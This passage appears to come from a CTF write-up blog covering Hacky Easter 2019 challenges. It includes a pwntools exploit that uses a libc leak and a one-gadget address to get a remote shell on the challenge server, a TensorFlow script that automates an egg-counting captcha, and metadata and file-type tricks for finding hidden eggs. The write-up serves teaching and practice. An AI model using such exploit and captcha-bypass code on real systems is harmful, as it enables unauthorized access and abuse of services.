libc_leak - stdout_offset\nlog.success(&#039;libc base: &#039; + hex(libc_base))\nlog.info(&#039;solving maze now ...&#039;)\n\nheading = 0 # 0=north, 1=west, 2=south, 3=east\ncur = heading\nkey = &#039;&#039;\n\nwhile True:\n  p.sendline(getCmd(cur))\n  ret = p.recvuntil(&#039;&gt;&#039;)\n  #print(ret)\n  #print(getCmd(cur))\n  #if (key != &#039;&#039;): print(&#039;key: &#039; + key)\n  if (&#039;There is a wall!&#039; in ret):\n    if (cur == heading): heading = (heading - 1 ) % 4\n    cur = heading\n  else:\n    heading = cur\n    cur = (heading + 1) % 4\n\n  p.sendline(&#039;search&#039;)\n  ret = p.recvuntil(&#039;&gt;&#039;)\n  if (&#039;You found a key!&#039; in ret):\n    p.sendline(&#039;pick up&#039;)\n    p.recvuntil(&#039;You pick up the key: &#039;)\n    key = p.recv(32)\n    p.recvuntil(&#039;&gt;&#039;)\n    log.success(&#039;found key: &#039; + key)\n  if (&#039;You found a locked chest!&#039; in ret and key == &#039;&#039;):\n    log.info(&#039;found 
chest! sending exploit ...&#039;)\n    p.sendline(&#039;open&#039;)\n    p.recvuntil(&#039;The chest is locked. Please enter the key:\\n&gt; &#039;)\n    p.sendline(key + p64(libc_base + oneg2))\n    p.sendline(&#039;&#039;)  # enter -&gt; main menu\n    p.sendline(&#039;0&#039;) # 0 -&gt; trigger one gadget\n    p.recv(10000)\n    p.recv(10000)\n    p.recv(10000)\n    p.interactive()\n<\/pre><\/div>\n<br\/>I was quite lucky, since the second one gadget (offset <code>0x4526a<\/code>) in the first libc version I tried (<code>libc6_2.23-0ubuntu10_amd64.so<\/code>) worked immediately.\n<br\/>\n<br\/>Running the script yields a shell on the server:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# .\/exploit.py\n&#x5B;+] Opening connection to whale.hacking-lab.com on port 7331: Done\n&#x5B;+] libc base: 0x7f56eb32c000\n&#x5B;*] solving maze now ...\n&#x5B;+] found key: ac85228aa5fea80c85e7213136d8a3c5\n&#x5B;*] found chest! sending exploit ...\n&#x5B;*] Switching to interactive mode\n$ id\nuid=1000(maze) gid=1000(maze) groups=1000(maze)\n$ ls -al\ndrwxr-xr-x.  21 root root 4096 Apr 16 07:11 .\ndrwxr-xr-x.  21 root root 4096 Apr 16 07:11 ..\n-rwxr-xr-x.   1 root root    0 Apr 16 07:11 .dockerenv\ndrwxr-xr-x.   2 root root 4096 Jan  5 12:47 bin\ndrwxr-xr-x.   2 root root    6 Apr 12  2016 boot\ndrwxr-xr-x.   5 root root  360 Apr 16 07:11 dev\n-rw-r--r--.   1 root root  947 Mar 27 12:50 egg.txt\ndrwxr-xr-x.  53 root root 4096 Apr 16 07:11 etc\ndrwxr-xr-x.   3 root root   17 Feb 16 08:20 home\ndrwxr-xr-x.   9 root root 4096 Jan  5 12:47 lib\ndrwxr-xr-x.   2 root root   33 Jan 23  2018 lib64\ndrwxr-xr-x.   2 root root    6 Jan 23  2018 media\ndrwxr-xr-x.   2 root root    6 Jan 23  2018 mnt\ndrwxr-xr-x.   2 root root    6 Jan 23  2018 opt\ndr-xr-xr-x. 510 root root    0 Apr 16 07:11 proc\ndrwx------.   4 root root   64 Mar 27 14:08 root\ndrwxr-xr-x.   
5 root root   74 Jan  5 12:47 run\ndrwxr-xr-x.   2 root root 4096 Jan  5 12:47 sbin\ndrwxr-xr-x.   2 root root    6 Jan 23  2018 srv\ndr-xr-xr-x.  13 root root    0 Apr 16 07:08 sys\ndrwxrwxrwt.   2 root root   37 May 10 10:50 tmp\ndrwxr-xr-x.  10 root root   97 Jan 23  2018 usr\ndrwxr-xr-x.  11 root root 4096 Jan 23  2018 var\n$ cd home\n$ ls -al\ntotal 4\ndrwxr-xr-x.  3 root root   17 Feb 16 08:20 .\ndrwxr-xr-x. 21 root root 4096 Apr 16 07:11 ..\ndrwxr-xr-x.  2 root maze   79 Mar 27 12:52 maze\n$ cd maze\n$ ls -al\ntotal 100\ndrwxr-xr-x. 2 root maze    79 Mar 27 12:52 .\ndrwxr-xr-x. 3 root root    17 Feb 16 08:20 ..\n-rw-r--r--. 1 root maze   220 Aug 31  2015 .bash_logout\n-rw-r--r--. 1 root maze  3771 Aug 31  2015 .bashrc\n-rw-r--r--. 1 root maze   655 May 16  2017 .profile\n-rwxr-xr-x. 1 root root 69877 Mar 27 12:51 egg.png\n-rwxr-xr-x. 1 root root 14880 Mar 27 10:44 maze\n\n<\/pre><\/div>\n<br\/>As we can see, the folder <code>\/home\/maze<\/code> contains a file called <code>egg.png<\/code>. 
Let&#8217;s simply transfer this to our own machine using base64 and copy&#038;paste:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n$ cat egg.png | base64 -w0\niVBORw0KGgoAAAANSUhEUgAAAeAAAAHgCAYAAAB91L6VAAAABGdBTUEAA...\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# echo &#039;iVBORw0KGgoAAAANSUhEUgAAAeAAAAHgCAYAAAB91L6VAAAABGdBTUEAA...&#039; | base64 -d &gt; egg23.png\n<\/pre><\/div>\n<br\/>Finally a QR code that makes sense \ud83d\ude42\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_05.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-71XJ-G5CM-sa6f-mRFa<\/span>.\n<br\/>\n<h1 id=\"chlg24\">24 &#8211; CAPTEG<\/h1>\nIn contrast to a lot of challenges where you have to dig deep in order to understand what exactly needs to be done, the objective of this challenge was straightforward: count eggs and submit the appropriate amount.\n<br\/>\n<br\/>That does not sound too hard, but the problem is that you only have 7 seconds and have to pass 42 rounds:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg24_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>At first I tried different approaches to solve this with my own implementation: searching for RGB patterns, comparing RGB values, fuzzy hashing with a precalculated database, &#8230;\n<br\/>\n<br\/>Though, I only reached a success rate of about 80%. This would mean that the chance to survive 42 rounds is <code>0.8^42<\/code>, which is approximately <code>0.0085071%<\/code>. 
Not very satisfying.\n<br\/>\n<br\/>Thus I reluctantly decided to use <a href=\"https:\/\/www.tensorflow.org\/\" target=\"_new\" rel=\"noopener noreferrer\">TensorFlow<\/a> and followed <a href=\"https:\/\/pythonprogramming.net\/introduction-use-tensorflow-object-detection-api-tutorial\/\" target=\"_new\" rel=\"noopener noreferrer\">this very great tutorial<\/a>. Also <a href=\"https:\/\/tensorflow-object-detection-api-tutorial.readthedocs.io\/en\/latest\/index.html\" target=\"_new\" rel=\"noopener noreferrer\">the following page<\/a> contains useful information.\n<br\/>\n<br\/>The mentioned tutorial explains the necessary steps in great detail. At first we have to collect a fair amount of sample images and annotate them (designate where on the image the eggs are).\n<br\/>\n<br\/>In order to do this, I used <a href=\"https:\/\/github.com\/tzutalin\/labelImg\" target=\"_new\" rel=\"noopener noreferrer\">labelImg<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg24_02.png\" width=\"900\"\/>\n<br\/>\n<br\/>I annotated a total of 32 images. The output of <code>labelImg<\/code> must be converted before further processing. These steps are also described in the <a href=\"https:\/\/pythonprogramming.net\/creating-tfrecord-files-tensorflow-object-detection-api-tutorial\/?completed=\/custom-objects-tracking-tensorflow-object-detection-api-tutorial\/\" target=\"_new\" rel=\"noopener noreferrer\">mentioned tutorial<\/a>.\n<br\/>\n<br\/>The next step is to separate the images into test data and train data and start training the model (described <a href=\"https:\/\/pythonprogramming.net\/training-custom-objects-tensorflow-object-detection-api-tutorial\/?completed=\/creating-tfrecord-files-tensorflow-object-detection-api-tutorial\/\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>).\n<br\/>\n<br\/>I trained the model for about 24 hours. 
After the training is done, the inference graph needs to be exported and the sample python script of the tutorial needs to be adjusted a little bit (see <a href=\"https:\/\/pythonprogramming.net\/testing-custom-object-detector-tensorflow-object-detection-api-tutorial\/?completed=\/training-custom-objects-tensorflow-object-detection-api-tutorial\/\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>).\n<br\/>\n<br\/>At first I tried to do the detection on the whole image containing all nine squares, but the accuracy rate was not satisfying. So I split the image into smaller images only containing two squares. This raised the accuracy rate considerably.\n<br\/>\n<br\/>The only thing left to do is to add a few lines in the sample script in order to retrieve the images and submit the amount of counted eggs:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\n\nfrom distutils.version import StrictVersion\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\n# This is needed since the notebook is stored in the object_detection folder.\nsys.path.append(&quot;..&quot;)\nsys.path.append(&#039;\/opt\/tensorflow\/models&#039;) # point to your tensorflow dir\nsys.path.append(&#039;\/opt\/tensorflow\/models\/research\/object_detection&#039;) # point to your tensorflow dir\nsys.path.append(&#039;\/opt\/tensorflow\/models\/slim&#039;) # point to your slim dir\n\nfrom object_detection.utils import ops as utils_ops\n\nif StrictVersion(tf.__version__) &lt; StrictVersion(&#039;1.12.0&#039;):\n  raise ImportError(&#039;Please upgrade your TensorFlow installation to v1.12.*.&#039;)\n\n\nfrom utils import label_map_util\n\nfrom utils import visualization_utils as vis_util\n\nimport requests\nfrom PIL import 
Image\nimport time\n\n# What model to download.\nMODEL_NAME = &#039;eggs_graph2&#039;\nMODEL_FILE = MODEL_NAME + &#039;.tar.gz&#039;\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_FROZEN_GRAPH = &#039;\/opt\/tensorflow\/models\/research\/object_detection\/&#039;+ MODEL_NAME + &#039;\/frozen_inference_graph.pb&#039;\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join(&#039;\/root\/Documents\/he19\/egg24\/train\/training&#039;, &#039;object-detection.pbtxt&#039;)\n\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n  od_graph_def = tf.GraphDef()\n  with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, &#039;rb&#039;) as fid:\n    serialized_graph = fid.read()\n    od_graph_def.ParseFromString(serialized_graph)\n    tf.import_graph_def(od_graph_def, name=&#039;&#039;)\n\ncategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\ndef load_image_into_numpy_array(image):\n  (im_width, im_height) = image.size\n  return np.array(image.getdata()).reshape(\n      (im_height, im_width, 3)).astype(np.uint8)\n\n\n# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.\nPATH_TO_TEST_IMAGES_DIR = &#039;test_images&#039;\nTEST_IMAGE_PATHS = &#x5B; os.path.join(PATH_TO_TEST_IMAGES_DIR, &#039;image{}.jpg&#039;.format(i)) for i in range(1, 2) ]\n\n# Size, in inches, of the output images.\nIMAGE_SIZE = (12, 8)\n\ndef run_inference_for_single_image(image, graph):\n  with graph.as_default():\n    with tf.Session() as sess:\n      # Get handles to input and output tensors\n      ops = tf.get_default_graph().get_operations()\n      all_tensor_names = {output.name for op in ops for output in op.outputs}\n      tensor_dict = {}\n      for key in &#x5B;\n          &#039;num_detections&#039;, &#039;detection_boxes&#039;, &#039;detection_scores&#039;,\n          
&#039;detection_classes&#039;, &#039;detection_masks&#039;\n      ]:\n        tensor_name = key + &#039;:0&#039;\n        if tensor_name in all_tensor_names:\n          tensor_dict&#x5B;key] = tf.get_default_graph().get_tensor_by_name(\n              tensor_name)\n      if &#039;detection_masks&#039; in tensor_dict:\n        # The following processing is only for single image\n        detection_boxes = tf.squeeze(tensor_dict&#x5B;&#039;detection_boxes&#039;], &#x5B;0])\n        detection_masks = tf.squeeze(tensor_dict&#x5B;&#039;detection_masks&#039;], &#x5B;0])\n        # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n        real_num_detection = tf.cast(tensor_dict&#x5B;&#039;num_detections&#039;]&#x5B;0], tf.int32)\n        detection_boxes = tf.slice(detection_boxes, &#x5B;0, 0], &#x5B;real_num_detection, -1])\n        detection_masks = tf.slice(detection_masks, &#x5B;0, 0, 0], &#x5B;real_num_detection, -1, -1])\n        detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n            detection_masks, detection_boxes, image.shape&#x5B;1], image.shape&#x5B;2])\n        detection_masks_reframed = tf.cast(\n            tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n        # Follow the convention by adding back the batch dimension\n        tensor_dict&#x5B;&#039;detection_masks&#039;] = tf.expand_dims(\n            detection_masks_reframed, 0)\n      image_tensor = tf.get_default_graph().get_tensor_by_name(&#039;image_tensor:0&#039;)\n\n      # Run inference\n      output_dict = sess.run(tensor_dict,\n                             feed_dict={image_tensor: image})\n\n      # all outputs are float32 numpy arrays, so convert types as appropriate\n      output_dict&#x5B;&#039;num_detections&#039;] = int(output_dict&#x5B;&#039;num_detections&#039;]&#x5B;0])\n      output_dict&#x5B;&#039;detection_classes&#039;] = output_dict&#x5B;\n          
&#039;detection_classes&#039;]&#x5B;0].astype(np.int64)\n      output_dict&#x5B;&#039;detection_boxes&#039;] = output_dict&#x5B;&#039;detection_boxes&#039;]&#x5B;0]\n      output_dict&#x5B;&#039;detection_scores&#039;] = output_dict&#x5B;&#039;detection_scores&#039;]&#x5B;0]\n      if &#039;detection_masks&#039; in output_dict:\n        output_dict&#x5B;&#039;detection_masks&#039;] = output_dict&#x5B;&#039;detection_masks&#039;]&#x5B;0]\n  return output_dict\n\ndef countEggs(image, out_file):\n  # the array based representation of the image will be used later in order to prepare the\n  # result image with boxes and labels on it.\n  image_np = load_image_into_numpy_array(image)\n  # Expand dimensions since the model expects images to have shape: &#x5B;1, None, None, 3]\n  image_np_expanded = np.expand_dims(image_np, axis=0)\n  # Actual detection.\n  output_dict = run_inference_for_single_image(image_np_expanded, detection_graph)\n  # Visualization of the results of a detection.\n  if (len(out_file) &gt; 0):\n    vis_util.visualize_boxes_and_labels_on_image_array(\n      image_np,\n      output_dict&#x5B;&#039;detection_boxes&#039;],\n      output_dict&#x5B;&#039;detection_classes&#039;],\n      output_dict&#x5B;&#039;detection_scores&#039;],\n      category_index,\n      instance_masks=output_dict.get(&#039;detection_masks&#039;),\n      use_normalized_coordinates=True,\n      min_score_thresh=.1,\n      line_thickness=4)\n    plt.figure(figsize=IMAGE_SIZE)\n    plt.imshow(image_np)\n    plt.savefig(out_file)\n\n  x = 0\n  i = 0\n  for score in output_dict&#x5B;&#039;detection_scores&#039;]:\n    if (score &gt; 0.5):\n      if(output_dict&#x5B;&#039;detection_classes&#039;]&#x5B;i] != 1): print(&#039;OIASDAS&#039;)\n      x += 1\n    i += 1\n\n  return x\n\n\n\n# +++++++++++++++++++++++++++++++++++++++++++++++++\n# Entry Point\n\ns = requests.Session()\n\nwhile True:\n  s.get(&#039;http:\/\/whale.hacking-lab.com:3555\/&#039;)\n  pic = 
s.get(&#039;http:\/\/whale.hacking-lab.com:3555\/picture&#039;)\n  f = open(&#039;pic_tmp.jpg&#039;, &#039;w&#039;)\n  f.write(pic.content)\n  f.close()\n\n  im = Image.open(&#039;pic_tmp.jpg&#039;)\n  pix = im.load()\n\n  eggCount = 0\n  picCnt = 0\n  tmp = &#x5B;]\n\n  # split image\n  for i in range(3):\n    for j in range(3):\n      for w in range(300):\n        for h in range(300):\n          tmp.append(pix&#x5B;i*310+h,j*310+w])\n\n      picCnt += 1\n      if (picCnt%2 == 0 or picCnt == 9):\n        picId = picCnt\/2\n        if (picCnt == 9): picId = 5\n        outImg = Image.new(&#039;RGB&#039;, (300, 600))\n        outImg.putdata(tmp)\n        tmp = &#x5B;]\n        eggCount += countEggs(outImg, &#039;&#039;)\n\n  r = s.post(&#039;http:\/\/whale.hacking-lab.com:3555\/verify&#039;, data={&#039;s&#039;:str(eggCount)})\n  resp = r.text\n  print(resp)\n  if (&#039;Wrong solution&#039; in resp): continue\n<\/pre><\/div>\n<br\/>Running the script yields the flag after 42 successful rounds:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg24\/yet_again_tensor# cat sol.txt\nroot@kali:~\/Documents\/he19\/egg24\/yet_again_tensor# python splitOwn.py\n\/opt\/tensorflow\/models\/research\/object_detection\/utils\/visualization_utils.py:26: UserWarning:\nThis call to matplotlib.use() has no effect because the backend has already\nbeen chosen; matplotlib.use() must be called *before* pylab, matplotlib.pyplot,\nor matplotlib.backends is imported for the first time.\n\nThe backend was *originally* set to &#039;TkAgg&#039; by the following code:\n  File &quot;splitOwn.py&quot;, line 12, in &lt;module&gt;\n    from matplotlib import pyplot as plt\n  File &quot;\/usr\/lib\/python2.7\/dist-packages\/matplotlib\/pyplot.py&quot;, line 71, in &lt;module&gt;\n    from matplotlib.backends import pylab_setup\n  File 
&quot;\/usr\/lib\/python2.7\/dist-packages\/matplotlib\/backends\/__init__.py&quot;, line 16, in &lt;module&gt;\n    line for line in traceback.format_stack()\n\n\n  import matplotlib; matplotlib.use(&#039;Agg&#039;)  # pylint: disable=multiple-statements\n2019-05-06 04:43:23.902596: I tensorflow\/core\/platform\/cpu_feature_guard.cc:141] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2\n2019-05-06 04:43:23.918183: I tensorflow\/core\/platform\/profile_utils\/cpu_utils.cc:94] CPU Frequency: 2207995000 Hz\n2019-05-06 04:43:23.918297: I tensorflow\/compiler\/xla\/service\/service.cc:150] XLA service 0x55ba775afa80 executing computations on platform Host. Devices:\n2019-05-06 04:43:23.918339: I tensorflow\/compiler\/xla\/service\/service.cc:158]   StreamExecutor device (0): &lt;undefined&gt;, &lt;undefined&gt;\nGreat success. Round 1 solved.\nGreat success. Round 2 solved.\nGreat success. Round 3 solved.\nGreat success. Round 4 solved.\nGreat success. Round 5 solved.\nGreat success. Round 6 solved.\nGreat success. Round 7 solved.\nGreat success. Round 8 solved.\nGreat success. Round 9 solved.\nGreat success. Round 10 solved.\nGreat success. Round 11 solved.\nGreat success. Round 12 solved.\nGreat success. Round 13 solved.\nGreat success. Round 14 solved.\nGreat success. Round 15 solved.\nGreat success. Round 16 solved.\nGreat success. Round 17 solved.\nGreat success. Round 18 solved.\nGreat success. Round 19 solved.\nGreat success. Round 20 solved.\nGreat success. Round 21 solved.\nGreat success. Round 22 solved.\nGreat success. Round 23 solved.\nGreat success. Round 24 solved.\nGreat success. Round 25 solved.\nGreat success. Round 26 solved.\nGreat success. Round 27 solved.\nGreat success. Round 28 solved.\nGreat success. Round 29 solved.\nGreat success. Round 30 solved.\nGreat success. Round 31 solved.\nGreat success. Round 32 solved.\nGreat success. Round 33 solved.\nGreat success. Round 34 solved.\nGreat success. 
Round 35 solved.\nGreat success. Round 36 solved.\nGreat success. Round 37 solved.\nGreat success. Round 38 solved.\nGreat success. Round 39 solved.\nGreat success. Round 40 solved.\nGreat success. Round 41 solved.\nhe19-s7Jj-mO4C-rP13-ySsJ\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-s7Jj-mO4C-rP13-ySsJ<\/span>.\n<br\/>\n<h1 id=\"chlg25\">25 &#8211; Hidden Egg #1<\/h1>\nThe challenge description suggests that the egg is hidden in a basket.\n<br\/>\n<br\/>After logging in and selecting <code>Eggs<\/code> in the menu, we can see the image of an egg basket on the right-hand side:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg25_01.png\" width=\"800\"\/>\n<br\/>\n<br\/>Let&#8217;s download the image using <code>wget<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg25# wget https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/flags.jpg\n--2019-05-28 00:28:26--  https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/flags.jpg\nResolving hackyeaster.hacking-lab.com (hackyeaster.hacking-lab.com)... 80.74.140.117\nConnecting to hackyeaster.hacking-lab.com (hackyeaster.hacking-lab.com)|80.74.140.117|:443... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 25413 (25K) &#x5B;image\/jpeg]\nSaving to: \u2018flags.jpg\u2019\n\nflags.jpg                             100%&#x5B;=========================================================================&gt;]  24.82K  --.-KB\/s    in 0.02s\n\n2019-05-28 00:28:27 (1.35 MB\/s) - \u2018flags.jpg\u2019 saved &#x5B;25413\/25413]\n<\/pre><\/div>\n<br\/>Now we can inspect the metadata of the image by using <code>exiftool<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg25# exiftool flags.jpg\nExifTool Version Number         : 11.16\nFile Name                       : flags.jpg\nDirectory                       : .\nFile Size                       : 25 kB\nFile Modification Date\/Time     : 2019:04:04 09:56:52-04:00\nFile Access Date\/Time           : 2019:05:28 00:28:27-04:00\nFile Inode Change Date\/Time     : 2019:05:28 00:28:27-04:00\nFile Permissions                : rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nExif Byte Order                 : Big-endian (Motorola, MM)\nPhotometric Interpretation      : RGB\nImage Description               : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nSamples Per Pixel               : 3\nX Resolution                    : 72\nY Resolution                    : 72\nResolution Unit                 : inches\nSoftware                        : paint.net 4.1.4\nModify Date                     : 2017:11:29 10:31:26\nArtist                          : Thumper\nExif Version                    : 0221\nExif Image Width                : 732\nExif Image Height               : 458\nXP Title                        : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nXP Author          
             : Thumper\nXP Subject                      : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nPadding                         : (Binary data 1552 bytes, use -b option to extract)\nProfile CMM Type                : Linotronic\nProfile Version                 : 2.1.0\nProfile Class                   : Display Device Profile\nColor Space Data                : RGB\nProfile Connection Space        : XYZ\nProfile Date Time               : 1998:02:09 06:49:00\nProfile File Signature          : acsp\nPrimary Platform                : Microsoft Corporation\nCMM Flags                       : Not Embedded, Independent\nDevice Manufacturer             : Hewlett-Packard\nDevice Model                    : sRGB\nDevice Attributes               : Reflective, Glossy, Positive, Color\nRendering Intent                : Perceptual\nConnection Space Illuminant     : 0.9642 1 0.82491\nProfile Creator                 : Hewlett-Packard\nProfile ID                      : 0\nProfile Copyright               : Copyright (c) 1998 Hewlett-Packard Company\nProfile Description             : sRGB IEC61966-2.1\nMedia White Point               : 0.95045 1 1.08905\nMedia Black Point               : 0 0 0\nRed Matrix Column               : 0.43607 0.22249 0.01392\nGreen Matrix Column             : 0.38515 0.71687 0.09708\nBlue Matrix Column              : 0.14307 0.06061 0.7141\nDevice Mfg Desc                 : IEC http:\/\/www.iec.ch\nDevice Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB\nViewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1\nViewing Cond Illuminant         : 19.6445 20.3718 16.8089\nViewing Cond Surround           : 3.92889 4.07439 3.36179\nViewing Cond Illuminant Type    : D50\nLuminance                       : 76.03647 80 87.12462\nMeasurement Observer            : CIE 1931\nMeasurement Backing             : 0 0 0\nMeasurement Geometry            : 
Unknown\nMeasurement Flare               : 0.999%\nMeasurement Illuminant          : D65\nTechnology                      : Cathode Ray Tube Display\nRed Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)\nGreen Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)\nBlue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)\nAbout                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b\nTitle                           : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nDescription                     : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nCreator                         : Thumper\nImage Width                     : 732\nImage Height                    : 458\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 732x458\nMegapixels                      : 0.335\n<\/pre><\/div>\n<br\/>Several fields (<code>Image Description<\/code>, <code>XP Title<\/code>, &#8230;) contain the URL <code>https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png<\/code>.\n<br\/>\n<br\/>Accessing this URL reveals that this is actually the hidden egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg25_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-xzCc-xElf-qJ4H-jay8<\/span>.\n<br\/>\n<h1 id=\"chlg26\">26 &#8211; Hidden Egg #2<\/h1>\nThe challenge description states that <i>a stylish blue egg is hidden somewhere on the webserver<\/i>.\n<br\/>\n<br\/>The word <code>stylish<\/code> is probably a hint that the egg is hidden within a 
<code>stylesheet<\/code>.\n<br\/>\n<br\/>Thus we should start by digging through the <code>.css<\/code> files loaded by the website:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg26_01.png\" width=\"1200\"\/>\n<br\/>\n<br\/>The end of the file <code>https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/css\/source-sans-pro.css<\/code> contains the following lines:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: css; gutter: false; title: ; notranslate\" title=\"\">\n...\n@font-face {\n    font-family: &#039;Egg26&#039;;\n    font-weight: 400;\n    font-style: normal;\n    font-stretch: normal;\n    src: local(&#039;Egg26&#039;),\n    local(&#039;Egg26&#039;),\n    url(&#039;..\/fonts\/TTF\/Egg26.ttf&#039;) format(&#039;truetype&#039;);\n}\n\n<\/pre><\/div>\n<br\/>So let&#8217;s download the file <code>Egg26.ttf<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# wget https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/fonts\/TTF\/Egg26.ttf\n--2019-05-28 00:42:07--  https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/fonts\/TTF\/Egg26.ttf\nResolving hackyeaster.hacking-lab.com (hackyeaster.hacking-lab.com)... 80.74.140.117\nConnecting to hackyeaster.hacking-lab.com (hackyeaster.hacking-lab.com)|80.74.140.117|:443... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 69562 (68K) &#x5B;application\/x-font-ttf]\nSaving to: \u2018Egg26.ttf\u2019\n\nEgg26.ttf                             100%&#x5B;=========================================================================&gt;]  67.93K  --.-KB\/s    in 0.04s\n\n2019-05-28 00:42:07 (1.85 MB\/s) - \u2018Egg26.ttf\u2019 saved &#x5B;69562\/69562]\n\n<\/pre><\/div>\n<br\/>Using the <code>file<\/code> tool, we can see that this is not a font but an image:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# file Egg26.ttf\nEgg26.ttf: PNG image data, 480 x 480, 8-bit\/color RGBA, non-interlaced\n<\/pre><\/div>\n<br\/>By renaming and opening the file, we can confirm that this is actually the hidden egg:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# mv Egg26.ttf egg26.png\n<\/pre><\/div>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg26_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-CuSV-SNEu-McPd-7eEg<\/span>.\n<br\/>\n<h1 id=\"chlg27\">27 &#8211; Hidden Egg #3<\/h1>\nThe challenge description states that <i>sometimes, there is a hidden bonus level<\/i>.\n<br\/>\n<br\/>Comparing the image of the challenge:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_01.jpg\" width=\"400\"\/>\n<br\/>\n<br\/>to the images of the challenges from <a href=\"#chlg21\">egg21<\/a> and <a href=\"#chlg22\">egg22<\/a>:\n<br\/>\n<br\/><table><tr><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_02.jpg\" width=\"400\"\/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_03.jpg\" 
